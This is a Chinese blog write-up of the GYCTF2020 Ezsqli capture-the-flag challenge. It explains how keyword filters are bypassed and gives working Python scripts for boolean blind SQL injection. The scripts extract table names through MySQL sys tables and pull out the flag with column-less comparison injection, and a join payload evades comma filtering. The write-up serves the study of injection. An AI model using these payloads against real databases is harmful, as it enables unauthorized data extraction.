(四)[GYCTF2020]Ezsqli(bool 盲注,无列名注入)

最新推荐文章于 2024-03-22 07:00:00 发布
最新推荐文章于 2024-03-22 07:00:00 发布
阅读量613 收藏 1
点赞数
文章标签: web安全 sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53856457/article/details/121547241
版权

打开,经典查询框,先随意提交1,post数据,抓包看一下

burp fuzz测试一下,可以看到常用的information,information_schema,or,union等关键字被过滤了,简单尝试后,发现没有回显,也没有报错,当语句为真时返回Nu1L,为假时返回V&N,考虑布尔盲注。

注:补充!!!

InnoDb引擎 从MYSQL5.5.8开始,InnoDB成为其默认存储引擎。而在MYSQL5.6以上的版本中,inndb增加了innodb_index_stats和innodb_table_stats两张表,这两张表中都存储了数据库和其数据表的信息,但是没有存储列名(即sys.schema_table_statistics查不出列段名) sys数据库 在5.7以上的MYSQL中,新增了sys数据库,该库的基础数据来自information_schema和performance_chema,其本身不存储数据。可以通过其中的schema_auto_increment_columns来获取表名。

跑表名:脚本

import requests
​
url = "http://2d3886f0-f7f7-4dd3-beb7-38a2a02ff2e6.node4.buuoj.cn:81/index.php"
flag = ""
payload = "1^(ascii(substr((select group_concat(table_name) from sys.x$schema_flattened_keys where table_schema=database()),{},1))={})^1"
​
for i in range(1,500):
    for j in range(32,128):
        py = payload.format(i,j)
        data = {"id": py}
        r = requests.post(url=url,data=data)
        if "Nu1L" in r.text:
            flag += chr(j)
            print(flag)
            break

得到两个表名:users233333333333333,f1ag_1s_h3r3_hhhhh

注:补充2!!!

当or被过滤(没过滤in)时,可利用innodb存储引擎获取表名

  • mysql.innodb_table_stats (此表中库名字段是database_name,而非table_schema)

  • mysql.innodb_index_stats

select group_concat(table_name) from mysql.innodb_table_stats where database_name=database();

join

通过join进行无列名注入获取列名

mysql> select * from (select * from users a join users b)c; ERROR 1060 (42S21): Duplicate column name 'id' mysql> select * from (select * from users a join users b using(id))c; ERROR 1060 (42S21): Duplicate column name 'username' mysql> select * from (select * from users a join users b using(id,username))c; ERROR 1060 (42S21): Duplicate column name 'password'

在学习大佬wp时还看到利用join绕过逗号过滤,tql

?id=-1' union select 1,2,3--+

不用逗号

?id=-1' union select * from (select 1)a join (select 2)b join (select 3)c--+

注:补充3!!!

无列名注入

过滤了union的无列名注入没学过 参考y1ng师傅的wp i春秋2020新春战“疫”网络安全公益赛GYCTF Writeup 第二天 – 颖奇L'Amore 看完只能感叹大佬tql 核心思想

假设 flag 为 flag {bbbbb},对于 payload 这个两个 select 查询的比较,是按位比较的,即先比第一位,如果相等则比第二位,以此类推;在某一位上,如果前者的 ASCII 大,不管总长度如何,ASCII 大的则大,这个不难懂,和 c 语言的 strcmp() 函数原理一样,举几个例子: glag > flag{bbbbb} alag{zzzzzzzzzzz} < flag{bbbbb} a < flag{bbbbb} z > flag{bbbbb} 在这样的按位比较过程中,因为在里层的 for() 循环,字典顺序是从 ASCII 码小到大来枚举并比较的,假设正确值为 b,那么字典跑到 b 的时候 b=b 不满足 payload 的大于号,只能继续下一轮循环,c>b 此时满足了,题目返回真,出现了 Nu1L 关键字,这个时候就需要记录 flag 的值了,但是此时这一位的 char 是 c,而真正的 flag 的这一位应该是 b 才对,所以 flag += chr(char-1),这就是为什么在存 flag 时候要往前偏移一位的原因 脚本如下:

import requests
import time
url = 'http://2d3886f0-f7f7-4dd3-beb7-38a2a02ff2e6.node4.buuoj.cn:81/index.php'
flag = ''
for j in range(1,50):
    for x in range(32,127):
        flag1 = flag+chr(x)
        payload = '2||((select 1,"{}")>(select * from f1ag_1s_h3r3_hhhhh))'.format(flag1)
​
        data = {'id': payload}
        re = requests.post(url=url, data=data)
​
        if 'Nu1L' in re.text:
            break
    time.sleep(2)
​
    flag += chr(x-1)
    print(flag)
    print(flag.lower())//跑出的flag大写无法提交,转换小写)

跑出flag:FLAG{7586A683-8049-49B5-8A5B-811AE0D94853} flag{7586a683-8049-49b5-8a5b-811ae0d94853}

补充四4:无列名注入【无列名注入 - Lee-404 - 博客园

uf9n1x
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF:[GYCTF2020]Ezsqli --过滤了information_schem ------ 无注入之过滤了union 使用ascii偏移来做
Zero_Adam的博客
03-15 1319
一、自己做: 直截了当的sql注入,先用fuzz字典跑一下: information_schema.table等被过滤了, 而且union 也被过了, 尝试了 || 和&& 等没有过滤,并且strsub,limit等都没有过滤,初步判断应该时可以的。 但是 information_chema等被过滤了,表和 都查不出来, 二、学到的&&不足: 当information_schema等被过滤的时候,能够查出数据库的名字,但是表明不知道,这时可以用这个来sys.schem
超级SQL注入工具,支持布尔,报错,union注入
最新发布
03-27
超级SQL注入工具目前支持Bool、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库。 超级SQL注入工具采用C#开发,底层采用Socket发包进行HTTP交互,极大的提升了发包效率,...
JSON传递bool类型数据的处理方式介绍
10-26
如果服务器端生成的JSON中有bool类型的数据时,到客户端解析时出现了小小的问题,下面简单为大家介绍下正确的处理方式
PHP登录环节防止sql注入的方法浅析
10-25
主要介绍了PHP登录环节防止sql注入的方法,需要的朋友可以参考下
[GYCTF2020]Ezsqli ---不会编程的崽
不会编程的崽的博客
03-22 417
既然知道是sql注入就不墨迹了。初步判断,判断的方发不用说了吧,然后fuzz一下,information被过滤了。再次可以判断为与无注入。因为无注入无法获得名,不能使用普通,而且这里也无法使用union select。来尝试一下新的方法吧。管他有名还是无名,先找到表。由于information被过滤了。这是比较形象的解释。所以构造payload。这题不难,难的是不知道有哪些表可以利用,不知道这种比较方法。又是sql新题型哦。最后在转化为小写就可以提交了。脚本写的不好,请见谅。
综合bool脚本.py
07-15
可以适用于部分SQL注入题目
[GYCTF2020]Ezsqli
weixin_68906365的博客
02-19 197
bool+无注入
to-bool:将类型转换为布尔值
05-20
傻瓜将数据类型转换为布尔值。关于这是一个非常基本的实用程序库,可帮助将基本的JS数据类型转换为...用法使用非常简单: var toBool = require("to-bool");if (toBool(someVariable)) {console.log("It's true.");}
jtest.rar_True_bool
09-19
Funzione: jtest --------------- Stabilisce se il metodo di Jacobi converge alla soluzione ... Restituisce bool = 0 (FALSE) se il metodo non converge. In questo caso il valore iter restituito è 0.
深入浅出带你学习无注入
郊眠寺
02-16 993
今天给大家带来了无注入的知识点不知道大家学会了没有,简单来说无注入还是挺考察思维的需要我们构造查询的payload并写出脚本,有兴趣的小伙伴不妨自己去试一下,喜欢本文希望可以一键三连支持一下。最近找到一个VUE的文档,它将VUE的各个知识点进行了总结,整理成了《Vue 开发必须知道的36个技巧》。内容比较详实,对各个知识点的讲解也十分到位。
名&位或注入随记
Aiwin的博客
02-07 822
名&位或注入随记
[GYCTF2020]Ezsqli(Mysql逐位比较)
D.MIND 的博客
04-23 495
前言 用到异或注入bool,这题我感觉最重要的还是理解mysql是如何比较字符串的 与利用 逐位比较 来配合 文章目录前言`sys.schema_table_statistics_with_buffer`查表mysql字符串 逐位比较大小总结 这题关键过滤了union 、if 、sleep与 information,当然常规的or 和 and也是过滤了的 一开始看到 if 和sleep被过滤了就没有往延时注入、union注入上想 异或注入就成了我的首选! 测试一下 id=1 ^ 1# Error
c# bool ^ bool
07-15
在C#中,`bool ^ bool` 表达式使用 `^` 运算符表示逻辑异或操作。逻辑异或操作符返回两个布尔值中只有一个为 true 时的结果为 true,否则返回 false。 以下是一些示例: ```csharp bool a = true; bool b = false;...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值